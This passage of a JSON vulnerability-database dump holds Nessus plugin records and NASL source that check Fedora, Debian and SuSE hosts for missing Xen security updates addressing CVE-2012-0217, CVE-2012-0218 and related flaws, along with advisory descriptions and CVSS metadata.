7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:freebsd:freebsd:9.0:*:*:*:*:*:*:*", "cpe:2.3:o:xen:xen:4.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:citrix:xenserver:6.0.2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:*:sp1:x64:*:*:*:*:*", "cpe:2.3:o:xen:xen:4.0.1:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_xp:*:sp3:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:*:*:x64:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2003:*:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:*:x64:*:*:*:*:*", "cpe:2.3:o:illumos:illumos:r13723:*:*:*:*:*:*:*", "cpe:2.3:o:xen:xen:4.0.2:*:*:*:*:*:*:*", "cpe:2.3:o:xen:xen:4.1.2:*:*:*:*:*:*:*", "cpe:2.3:o:sun:sunos:5.11:*:*:*:*:*:*:*", "cpe:2.3:o:xen:xen:4.1.0:*:*:*:*:*:*:*", "cpe:2.3:o:xen:xen:4.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:citrix:xenserver:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:xen:xen:4.1.1:*:*:*:*:*:*:*", "cpe:2.3:o:xen:xen:4.0.4:*:*:*:*:*:*:*", "cpe:2.3:o:joyent:smartos:20120614:*:*:*:*:*:*:*", "cpe:2.3:o:netbsd:netbsd:6.0:beta:*:*:*:*:*:*"]}], "nessus": [{"lastseen": "2021-01-12T10:10:43", "description": "make pygrub cope better with big files from guest (#818412\nCVE-2012-2625), 64-bit PV guest privilege escalation vulnerability\n[CVE-2012-0217], guest denial of service on syscall/sysenter exception\ngeneration [CVE-2012-0218], PV guest host Denial of Service\n[CVE-2012-2934]\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 11, "published": "2012-06-26T00:00:00", "title": "Fedora 16 : xen-4.1.2-8.fc16 (2012-9399)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2934", "CVE-2012-2625"], "modified": "2012-06-26T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:xen", "cpe:/o:fedoraproject:fedora:16"], "id": "FEDORA_2012-9399.NASL", "href": "https://www.tenable.com/plugins/nessus/59693", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2012-9399.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(59693);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_xref(name:\"FEDORA\", value:\"2012-9399\");\n\n script_name(english:\"Fedora 16 : xen-4.1.2-8.fc16 (2012-9399)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"make pygrub cope better with big files from guest (#818412\nCVE-2012-2625), 64-bit PV guest privilege escalation vulnerability\n[CVE-2012-0217], guest denial of service on syscall/sysenter exception\ngeneration [CVE-2012-0218], PV guest host Denial of Service\n[CVE-2012-2934]\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-June/082754.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f18b6bbe\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected xen package.\");\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:xen\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:16\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/06/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/06/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^16([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 16.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC16\", reference:\"xen-4.1.2-8.fc16\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"xen\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T10:10:43", "description": "make pygrub cope better with big files from guest (#818412\nCVE-2012-2625), 64-bit PV guest privilege escalation vulnerability\n[CVE-2012-0217], guest denial of service on syscall/sysenter exception\ngeneration [CVE-2012-0218], PV guest host Denial of Service\n[CVE-2012-2934]\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 11, "published": "2012-06-26T00:00:00", "title": "Fedora 15 : xen-4.1.2-8.fc15 (2012-9430)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2934", "CVE-2012-2625"], "modified": "2012-06-26T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:xen", "cpe:/o:fedoraproject:fedora:15"], "id": "FEDORA_2012-9430.NASL", "href": "https://www.tenable.com/plugins/nessus/59696", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2012-9430.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(59696);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_xref(name:\"FEDORA\", value:\"2012-9430\");\n\n script_name(english:\"Fedora 15 : xen-4.1.2-8.fc15 (2012-9430)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"make pygrub cope better with big files from guest (#818412\nCVE-2012-2625), 64-bit PV guest privilege escalation vulnerability\n[CVE-2012-0217], guest denial of service on syscall/sysenter exception\ngeneration [CVE-2012-0218], PV guest host Denial of Service\n[CVE-2012-2934]\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-June/082752.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?ebc2ae1d\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected xen package.\");\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:xen\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:15\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/06/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/06/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^15([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 15.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC15\", reference:\"xen-4.1.2-8.fc15\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"xen\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T10:10:43", "description": "64-bit PV guest privilege escalation vulnerability [CVE-2012-0217],\nguest denial of service on syscall/sysenter exception generation\n[CVE-2012-0218], PV guest host Denial of Service [CVE-2012-2934]\nEnable xenconsoled by default under systemd, adjust xend.service\nsystemd file to avoid selinux problems\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 11, "published": "2012-06-26T00:00:00", "title": "Fedora 17 : xen-4.1.2-20.fc17 (2012-9386)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2934"], "modified": "2012-06-26T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:17", "p-cpe:/a:fedoraproject:fedora:xen"], "id": "FEDORA_2012-9386.NASL", "href": "https://www.tenable.com/plugins/nessus/59692", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2012-9386.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(59692);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_xref(name:\"FEDORA\", value:\"2012-9386\");\n\n script_name(english:\"Fedora 17 : xen-4.1.2-20.fc17 (2012-9386)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"64-bit PV guest privilege escalation vulnerability [CVE-2012-0217],\nguest denial of service on syscall/sysenter exception generation\n[CVE-2012-0218], PV guest host Denial of Service [CVE-2012-2934]\nEnable xenconsoled by default under systemd, adjust xend.service\nsystemd file to avoid selinux problems\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=829732\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-June/082824.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?c5a16806\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected xen package.\");\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:xen\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:17\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/06/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/06/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^17([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 17.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC17\", reference:\"xen-4.1.2-20.fc17\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"xen\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T09:47:32", "description": "Several vulnerabilities were discovered in Xen, a hypervisor.\n\n - CVE-2012-0217\n Xen does not properly handle uncanonical return\n addresses on Intel amd64 CPUs, allowing amd64 PV guests\n to elevate to hypervisor privileges. AMD processors, HVM\n and i386 guests are not affected.\n\n - CVE-2012-0218\n Xen does not properly handle SYSCALL and SYSENTER\n instructions in PV guests, allowing unprivileged users\n inside a guest system to crash the guest system.\n\n - CVE-2012-2934\n Xen does not detect old AMD CPUs affected by AMD Erratum\n #121.\n\nFor CVE-2012-2934, Xen refuses to start domUs on affected systems\nunless the 'allow_unsafe' option is passed.", "edition": 18, "published": "2012-06-29T00:00:00", "title": "Debian DSA-2501-1 : xen - several vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2934"], "modified": "2012-06-29T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:6.0", "p-cpe:/a:debian:debian_linux:xen"], "id": "DEBIAN_DSA-2501.NASL", "href": "https://www.tenable.com/plugins/nessus/59779", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-2501. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(59779);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2012-0217\", \"CVE-2012-0218\", \"CVE-2012-2934\");\n script_bugtraq_id(53856, 53955, 53961);\n script_xref(name:\"DSA\", value:\"2501\");\n\n script_name(english:\"Debian DSA-2501-1 : xen - several vulnerabilities\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several vulnerabilities were discovered in Xen, a hypervisor.\n\n - CVE-2012-0217\n Xen does not properly handle uncanonical return\n addresses on Intel amd64 CPUs, allowing amd64 PV guests\n to elevate to hypervisor privileges. AMD processors, HVM\n and i386 guests are not affected.\n\n - CVE-2012-0218\n Xen does not properly handle SYSCALL and SYSENTER\n instructions in PV guests, allowing unprivileged users\n inside a guest system to crash the guest system.\n\n - CVE-2012-2934\n Xen does not detect old AMD CPUs affected by AMD Erratum\n #121.\n\nFor CVE-2012-2934, Xen refuses to start domUs on affected systems\nunless the 'allow_unsafe' option is passed.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2012-0217\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2012-0218\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2012-2934\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2012-2934\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/squeeze/xen\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2012/dsa-2501\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the xen packages.\n\nFor the stable distribution (squeeze), these problems have been fixed\nin version 4.0.1-5.2.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'FreeBSD Intel SYSRET Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:xen\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:6.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/06/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/06/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/06/29\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"6.0\", prefix:\"libxen-dev\", reference:\"4.0.1-5.2\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libxenstore3.0\", reference:\"4.0.1-5.2\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"xen-docs-4.0\", reference:\"4.0.1-5.2\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"xen-hypervisor-4.0-amd64\", reference:\"4.0.1-5.2\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"xen-hypervisor-4.0-i386\", reference:\"4.0.1-5.2\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"xen-utils-4.0\", reference:\"4.0.1-5.2\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"xenstore-utils\", reference:\"4.0.1-5.2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-20T14:42:00", "description": "Three security issues were found in XEN.\n\nTwo security issues are fixed by this update :\n\n - Due to incorrect fault handling in the XEN hypervisor it\n was possible for a XEN guest domain administrator to\n execute code in the XEN host environment.\n (CVE-2012-0217)\n\n - Also a guest user could crash the guest XEN kernel due\n to a protection fault bounce. The third fix is changing\n the Xen behaviour on certain hardware:. (CVE-2012-0218)\n\n - The issue is a denial of service issue on older pre-SVM\n AMD CPUs (AMD Erratum 121). AMD Erratum #121 is\n described in 'Revision Guide for AMD Athlon 64 and AMD\n Opteron Processors':\n http://support.amd.com/us/Processor_TechDocs/25759.pdf.\n (CVE-2012-2934)\n\n The following 130nm and 90nm (DDR1-only) AMD processors\n are subject to this erratum :\n\n - First-generation AMD-Opteron(tm) single and dual core\n processors in either 939 or 940 packages :\n\n - AMD Opteron(tm) 100-Series Processors\n\n - AMD Opteron(tm) 200-Series Processors\n\n - AMD Opteron(tm) 800-Series Processors\n\n - AMD Athlon(tm) processors in either 754, 939 or 940\n packages\n\n - AMD Sempron(tm) processor in either 754 or 939 packages\n\n - AMD Turion(tm) Mobile Technology in 754 package This\n issue does not effect Intel processors.\n\n The impact of this flaw is that a malicious PV guest\n user can halt the host system.\n\n As this is a hardware flaw, it is not fixable except by\n upgrading your hardware to a newer revision, or not\n allowing untrusted 64bit guestsystems.\n\n The patch changes the behaviour of the host system\n booting, which makes it unable to create guest machines\n until a specific boot option is set.\n\n There is a new XEN boot option 'allow_unsafe' for GRUB\n which allows the host to start guests again.\n\n This is added to /boot/grub/menu.lst in the line looking\n like this :\n\n kernel /boot/xen.gz .... allow_unsafe\n\n Note: .... in this example represents the existing boot\n options for the host.", "edition": 19, "published": "2013-01-25T00:00:00", "title": "SuSE 11.1 Security Update : Xen (SAT Patch Number 6399)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2934"], "modified": "2013-01-25T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:11:xen-tools", "p-cpe:/a:novell:suse_linux:11:xen-tools-domU", "p-cpe:/a:novell:suse_linux:11:xen-kmp-trace", "cpe:/o:novell:suse_linux:11", "p-cpe:/a:novell:suse_linux:11:xen", "p-cpe:/a:novell:suse_linux:11:xen-doc-pdf", "p-cpe:/a:novell:suse_linux:11:xen-doc-html", "p-cpe:/a:novell:suse_linux:11:xen-kmp-pae", "p-cpe:/a:novell:suse_linux:11:xen-libs", "p-cpe:/a:novell:suse_linux:11:xen-kmp-default"], "id": "SUSE_11_XEN-201206-120606.NASL", "href": "https://www.tenable.com/plugins/nessus/64233", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(64233);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2012-0217\", \"CVE-2012-0218\", \"CVE-2012-2934\");\n\n script_name(english:\"SuSE 11.1 Security Update : Xen (SAT Patch Number 6399)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Three security issues were found in XEN.\n\nTwo security issues are fixed by this update :\n\n - Due to incorrect fault handling in the XEN hypervisor it\n was possible for a XEN guest domain administrator to\n execute code in the XEN host environment.\n (CVE-2012-0217)\n\n - Also a guest user could crash the guest XEN kernel due\n to a protection fault bounce. The third fix is changing\n the Xen behaviour on certain hardware:. (CVE-2012-0218)\n\n - The issue is a denial of service issue on older pre-SVM\n AMD CPUs (AMD Erratum 121). AMD Erratum #121 is\n described in 'Revision Guide for AMD Athlon 64 and AMD\n Opteron Processors':\n http://support.amd.com/us/Processor_TechDocs/25759.pdf.\n (CVE-2012-2934)\n\n The following 130nm and 90nm (DDR1-only) AMD processors\n are subject to this erratum :\n\n - First-generation AMD-Opteron(tm) single and dual core\n processors in either 939 or 940 packages :\n\n - AMD Opteron(tm) 100-Series Processors\n\n - AMD Opteron(tm) 200-Series Processors\n\n - AMD Opteron(tm) 800-Series Processors\n\n - AMD Athlon(tm) processors in either 754, 939 or 940\n packages\n\n - AMD Sempron(tm) processor in either 754 or 939 packages\n\n - AMD Turion(tm) Mobile Technology in 754 package This\n issue does not effect Intel processors.\n\n The impact of this flaw is that a malicious PV guest\n user can halt the host system.\n\n As this is a hardware flaw, it is not fixable except by\n upgrading your hardware to a newer revision, or not\n allowing untrusted 64bit guestsystems.\n\n The patch changes the behaviour of the host system\n booting, which makes it unable to create guest machines\n until a specific boot option is set.\n\n There is a new XEN boot option 'allow_unsafe' for GRUB\n which allows the host to start guests again.\n\n This is added to /boot/grub/menu.lst in the line looking\n like this :\n\n kernel /boot/xen.gz .... allow_unsafe\n\n Note: .... in this example represents the existing boot\n options for the host.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=757537\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=757970\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=764077\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2012-0217.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2012-0218.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2012-2934.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply SAT patch number 6399.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'FreeBSD Intel SYSRET Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", 